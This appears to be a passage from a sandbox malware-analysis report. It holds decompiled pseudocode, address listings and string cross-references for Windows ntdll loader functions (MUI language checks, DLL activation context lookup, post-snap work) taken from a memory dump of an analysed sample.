						L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00A31B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00A31B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00A31B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00A31B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00A44620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00A6F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00A71370(_t276, 0xa04e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00A6BB40(0,  &_v68, _t170);
									if(L00A343C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00A6BB40(_t257,  &_v68, _t243);
								if(L00A343C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00A71370(_t278, 0xa04e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00A44620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00A6F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00A71370(_v16, 0xa04e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00A6BB40(_t262,  &_v68, _t244);
								if(L00A343C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00A71370(_t282, 0xa04e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00A6BB40(_t262,  &_v68, _t201);
							if(L00A343C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00A44620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00A6F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00A71370(_t280, 0xa04e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00A6BB40(_t267,  &_v68, _t245);
							if(L00A343C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00A71370(_t284, 0xa04e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00A6BB40(_t267,  &_v68, _t224);
						if(L00A343C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                              0x00a33d3c
                                                              0x00a33d42
                                                              0x00a33d44
                                                              0x00a33d46
                                                              0x00a33d49
                                                              0x00a33d4c
                                                              0x00a33d4f
                                                              0x00a33d52
                                                              0x00a33d55
                                                              0x00a33d58
                                                              0x00a33d5b
                                                              0x00a33d5f
                                                              0x00a33d61
                                                              0x00a33d66
                                                              0x00a88213
                                                              0x00a88218
                                                              0x00a34085
                                                              0x00a34088
                                                              0x00a3408e
                                                              0x00a34094
                                                              0x00a3409a
                                                              0x00a340a0
                                                              0x00a340a6
                                                              0x00a340a9
                                                              0x00a340af
                                                              0x00a340b6
                                                              0x00a340bd
                                                              0x00a340bd
                                                              0x00a33d83
                                                              0x00a8821f
                                                              0x00a88229
                                                              0x00a88238
                                                              0x00a88238
                                                              0x00a8823d
                                                              0x00a8823d
                                                              0x00a33da0
                                                              0x00a33daf
                                                              0x00a33db5
                                                              0x00a33dba
                                                              0x00a33dba
                                                              0x00a33dd4
                                                              0x00a33e94
                                                              0x00a33eab
                                                              0x00a33f6d
                                                              0x00a33f84
                                                              0x00a3406b
                                                              0x00a3406b
                                                              0x00a3406e
                                                              0x00a3406e
                                                              0x00a34070
                                                              0x00a34074
                                                              0x00a88351
                                                              0x00a88351
                                                              0x00a3407a
                                                              0x00a3407f
                                                              0x00a8835d
                                                              0x00a88370
                                                              0x00a88377
                                                              0x00a88379
                                                              0x00a8837c
                                                              0x00a8837c
                                                              0x00a8835d
                                                              0x00000000
                                                              0x00a3407f
                                                              0x00a33f8a
                                                              0x00a33f8d
                                                              0x00a33f90
                                                              0x00a33f95
                                                              0x00a8830d
                                                              0x00a8830f
                                                              0x00a33f9b
                                                              0x00a33fac
                                                              0x00a33fae
                                                              0x00a33fb1
                                                              0x00a33fb1
                                                              0x00a33fb6
                                                              0x00a88317
                                                              0x00a8831a
                                                              0x00000000
                                                              0x00a33fbc
                                                              0x00a33fc1
                                                              0x00a33fc9
                                                              0x00a33fd7
                                                              0x00a33fda
                                                              0x00a33fdd
                                                              0x00a34021
                                                              0x00a34021
                                                              0x00a34029
                                                              0x00a34030
                                                              0x00a34044
                                                              0x00a34046
                                                              0x00a34046
                                                              0x00a34044
                                                              0x00a34049
                                                              0x00a88327
                                                              0x00a88334
                                                              0x00a88339
                                                              0x00a8833c
                                                              0x00a3404f
                                                              0x00a3404f
                                                              0x00a3404f
                                                              0x00a34051
                                                              0x00a34056
                                                              0x00a34063
                                                              0x00a34063
                                                              0x00a34068
                                                              0x00000000
                                                              0x00a34068
                                                              0x00a33fdf
                                                              0x00a33fe2
                                                              0x00a33fe4
                                                              0x00a33fe7
                                                              0x00a33fef
                                                              0x00a34003
                                                              0x00a34005
                                                              0x00a34005
                                                              0x00a3400c
                                                              0x00a34013
                                                              0x00a34016
                                                              0x00a34017
                                                              0x00a3401b
                                                              0x00a3401e
                                                              0x00000000
                                                              0x00a3401e
                                                              0x00a33fb6
                                                              0x00a33eb1
                                                              0x00a33eb4
                                                              0x00a33eb7
                                                              0x00a33ebc
                                                              0x00a882a9
                                                              0x00a882ab
                                                              0x00a33ec2
                                                              0x00a33ed3
                                                              0x00a33ed5
                                                              0x00a33ed8
                                                              0x00a33ed8
                                                              0x00a33edd
                                                              0x00a882b3
                                                              0x00a882b6
                                                              0x00000000
                                                              0x00a33ee3
                                                              0x00a33ee8
                                                              0x00a33eed
                                                              0x00a33ef0
                                                              0x00a33ef3
                                                              0x00a33f02
                                                              0x00a33f05
                                                              0x00a33f08
                                                              0x00a882c0
                                                              0x00a882c3
                                                              0x00a882c5
                                                              0x00a882c8
                                                              0x00a882d0
                                                              0x00a882e4
                                                              0x00a882e6
                                                              0x00a882e6
                                                              0x00a882ed
                                                              0x00a882f4
                                                              0x00a882f7
                                                              0x00a882f8
                                                              0x00a882fc
                                                              0x00a882ff
                                                              0x00a882ff
                                                              0x00a33f0e
                                                              0x00a33f11
                                                              0x00a33f16
                                                              0x00a33f1d
                                                              0x00a33f31
                                                              0x00a88307
                                                              0x00a88307
                                                              0x00a33f31
                                                              0x00a33f39
                                                              0x00a33f48
                                                              0x00a33f4d
                                                              0x00a33f50
                                                              0x00a33f50
                                                              0x00a33f53
                                                              0x00a33f58
                                                              0x00a33f65
                                                              0x00a33f65
                                                              0x00a33f6a
                                                              0x00000000
                                                              0x00a33f6a
                                                              0x00a33edd
                                                              0x00a33dda
                                                              0x00a33ddd
                                                              0x00a33de0
                                                              0x00a33de5
                                                              0x00a88245
                                                              0x00a33deb
                                                              0x00a33df7
                                                              0x00a33dfc
                                                              0x00a33dfe
                                                              0x00a33e01
                                                              0x00a33e01
                                                              0x00a33e06
                                                              0x00a8824d
                                                              0x00a8824f
                                                              0x00a88254
                                                              0x00000000
                                                              0x00a33e0c
                                                              0x00a33e11
                                                              0x00a33e16
                                                              0x00a33e19
                                                              0x00a33e29
                                                              0x00a33e2c
                                                              0x00a33e2f
                                                              0x00a8825c
                                                              0x00a8825f
                                                              0x00a88261
                                                              0x00a88264
                                                              0x00a8826c
                                                              0x00a88280
                                                              0x00a88282
                                                              0x00a88282
                                                              0x00a88289
                                                              0x00a88290
                                                              0x00a88293
                                                              0x00a88294
                                                              0x00a88298
                                                              0x00a8829b
                                                              0x00a8829b
                                                              0x00a33e35
                                                              0x00a33e38
                                                              0x00a33e3d
                                                              0x00a33e44
                                                              0x00a33e58
                                                              0x00a882a3
                                                              0x00a882a3
                                                              0x00a33e58
                                                              0x00a33e60
                                                              0x00a33e6f
                                                              0x00a33e74
                                                              0x00a33e77
                                                              0x00a33e77
                                                              0x00a33e7a
                                                              0x00a33e7f
                                                              0x00a33e8c
                                                              0x00a33e8c
                                                              0x00a33e91
                                                              0x00000000
                                                              0x00a33e91

                                                              Strings
                                                              • Kernel-MUI-Language-Allowed, xrefs: 00A33DC0
                                                              • Kernel-MUI-Number-Allowed, xrefs: 00A33D8C
                                                              • Kernel-MUI-Language-SKU, xrefs: 00A33F70
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00A33E97
                                                              • WindowsExcludedProcs, xrefs: 00A33D6F
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 0-258546922
                                                              • Opcode ID: 60a151a08260fb6f0306af6130867b68d69ac17d7734bd1c2943659f1576abdb
                                                              • Instruction ID: 91683841efc33d03ddb490b131e2d9a81957c0e96c157abf6436abc0b7fef45f
                                                              • Opcode Fuzzy Hash: 60a151a08260fb6f0306af6130867b68d69ac17d7734bd1c2943659f1576abdb
                                                              • Instruction Fuzzy Hash: 56F14E76D04619EFCB15DF98C981AEEBBB9FF48750F14406AF505AB251EB349E00CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A58E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 44%
                                                              			E00A58E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xb1d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xb18464; // 0x74720110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xb15780 & 0x00000003) != 0) {
							E00AA5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xb15780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00A6B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xb17984; // 0x4d2b80
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xb18464; // 0x74720110
					 *0xb1b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00A59B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xb15780 & 0x00000005) != 0) {
						_push(_t49);
						E00AA5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                              0x00a58e0f
                                                              0x00a58e16
                                                              0x00a58e19
                                                              0x00a58e1b
                                                              0x00a58e21
                                                              0x00a58e7f
                                                              0x00a58e85
                                                              0x00a99354
                                                              0x00a9936c
                                                              0x00a99371
                                                              0x00a9937b
                                                              0x00a99381
                                                              0x00a99381
                                                              0x00a9937b
                                                              0x00a58e9d
                                                              0x00a58e9d
                                                              0x00a58e29
                                                              0x00a58e2c
                                                              0x00a58e38
                                                              0x00a58e3e
                                                              0x00a58e43
                                                              0x00a58eb5
                                                              0x00a58eb9
                                                              0x00a992aa
                                                              0x00a992af
                                                              0x00a992e8
                                                              0x00a992e8
                                                              0x00a992af
                                                              0x00a58eb9
                                                              0x00a58e45
                                                              0x00a58e53
                                                              0x00a58e5b
                                                              0x00a58e5f
                                                              0x00a58e78
                                                              0x00a58e78
                                                              0x00a58e7d
                                                              0x00a58ec3
                                                              0x00a58ecd
                                                              0x00a58ed2
                                                              0x00a58ed2
                                                              0x00a58ec5
                                                              0x00a58ec5
                                                              0x00000000
                                                              0x00a58e7d
                                                              0x00a58e67
                                                              0x00a58ea4
                                                              0x00a9931a
                                                              0x00000000
                                                              0x00000000
                                                              0x00a99320
                                                              0x00a58ea4
                                                              0x00a58e70
                                                              0x00a99325
                                                              0x00a99340
                                                              0x00a99345
                                                              0x00a99345
                                                              0x00a58e76
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              Strings
                                                              • LdrpFindDllActivationContext, xrefs: 00A99331, 00A9935D
                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00A9932A
                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 00A9933B, 00A99367
                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 00A99357
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 0-3779518884
                                                              • Opcode ID: 702822848d908634de5536951c0e16fae65a6da2d2c4fd05ae6ae93a911780af
                                                              • Instruction ID: d64b12950ba530e00959c4870fc3a772c15a9f6e85b011c6843d38b473d77905
                                                              • Opcode Fuzzy Hash: 702822848d908634de5536951c0e16fae65a6da2d2c4fd05ae6ae93a911780af
                                                              • Instruction Fuzzy Hash: 8A412C31A00315AFDF35AB18DC4BA7673B5BB10746F058569EC04B71E1EFB8EC888681
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A38794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 83%
                                                              			E00A38794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00A3934A() != 0) {
								_t159 = E00AAA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xb15780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00AA5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xb15780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00A3849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00A38999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00A38999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xb15c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xb15c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00A42280(_t92, 0xb186cc);
															_t94 = E00AF9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00A561A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xb15c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00A38A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xb15c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xb15c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00A6F380(_t136, 0xa01184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00A42280(_t108, 0xb186cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00A561A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00AF9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00A3FFB0(_t118, _t156, 0xb186cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00A69A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                              0x00a38799
                                                              0x00a3879d
                                                              0x00a387a1
                                                              0x00a387a3
                                                              0x00a387a8
                                                              0x00a387c3
                                                              0x00a387c3
                                                              0x00a387c8
                                                              0x00a387d1
                                                              0x00a387d4
                                                              0x00a387d8
                                                              0x00a387e5
                                                              0x00a387ec
                                                              0x00a89bfe
                                                              0x00a89c00
                                                              0x00a89c02
                                                              0x00a89c08
                                                              0x00a89c0d
                                                              0x00a89c0f
                                                              0x00a89c14
                                                              0x00a89c2d
                                                              0x00a89c32
                                                              0x00a89c37
                                                              0x00a89c3a
                                                              0x00a89c3c
                                                              0x00a89c42
                                                              0x00a89c42
                                                              0x00a89c3c
                                                              0x00a89c02
                                                              0x00a387da
                                                              0x00a387df
                                                              0x00a387e3
                                                              0x00000000
                                                              0x00000000
                                                              0x00a387e3
                                                              0x00a387f2
                                                              0x00000000
                                                              0x00a387fb
                                                              0x00a387fd
                                                              0x00a387fe
                                                              0x00a3880e
                                                              0x00a3880f
                                                              0x00a38810
                                                              0x00a38814
                                                              0x00a3881a
                                                              0x00a3881c
                                                              0x00a3881f
                                                              0x00a38821
                                                              0x00a38822
                                                              0x00a38824
                                                              0x00a38826
                                                              0x00a3882c
                                                              0x00a3882e
                                                              0x00a89c48
                                                              0x00a89c48
                                                              0x00a38834
                                                              0x00a38834
                                                              0x00a38837
                                                              0x00000000
                                                              0x00000000
                                                              0x00a38837
                                                              0x00a3882e
                                                              0x00a3883d
                                                              0x00a38840
                                                              0x00a38843
                                                              0x00a38846
                                                              0x00a38849
                                                              0x00a3884c
                                                              0x00a3884e
                                                              0x00a38850
                                                              0x00a38852
                                                              0x00a38854
                                                              0x00a38857
                                                              0x00a388b4
                                                              0x00a388b6
                                                              0x00a388b6
                                                              0x00a38859
                                                              0x00a38859
                                                              0x00a38859
                                                              0x00a38861
                                                              0x00a38866
                                                              0x00a3886a
                                                              0x00a3893d
                                                              0x00a38941
                                                              0x00000000
                                                              0x00a38947
                                                              0x00a38947
                                                              0x00a3894a
                                                              0x00a3894c
                                                              0x00000000
                                                              0x00a38952
                                                              0x00a38955
                                                              0x00a3895a
                                                              0x00a3895d
                                                              0x00a3895d
                                                              0x00a3895f
                                                              0x00a38961
                                                              0x00a38961
                                                              0x00a38968
                                                              0x00000000
                                                              0x00000000
                                                              0x00a3896a
                                                              0x00a3896b
                                                              0x00a3896e
                                                              0x00000000
                                                              0x00a38970
                                                              0x00a38970
                                                              0x00a38970
                                                              0x00a38970
                                                              0x00a38972
                                                              0x00a38972
                                                              0x00a38974
                                                              0x00000000
                                                              0x00a3897a
                                                              0x00a3897a
                                                              0x00a3897d
                                                              0x00000000
                                                              0x00a38983
                                                              0x00a89c65
                                                              0x00a89c6d
                                                              0x00a89c72
                                                              0x00a89c75
                                                              0x00a89c75
                                                              0x00a89c82
                                                              0x00a89c86
                                                              0x00a89c87
                                                              0x00a89c88
                                                              0x00a89c89
                                                              0x00a89c8c
                                                              0x00a89c90
                                                              0x00a89c95
                                                              0x00a89c97
                                                              0x00a89ca0
                                                              0x00a89ca3
                                                              0x00a89ca9
                                                              0x00a89ca9
                                                              0x00000000
                                                              0x00a89ca9
                                                              0x00a89ca3
                                                              0x00000000
                                                              0x00a89c97
                                                              0x00a3897d
                                                              0x00000000
                                                              0x00a38974
                                                              0x00a38988
                                                              0x00a38992
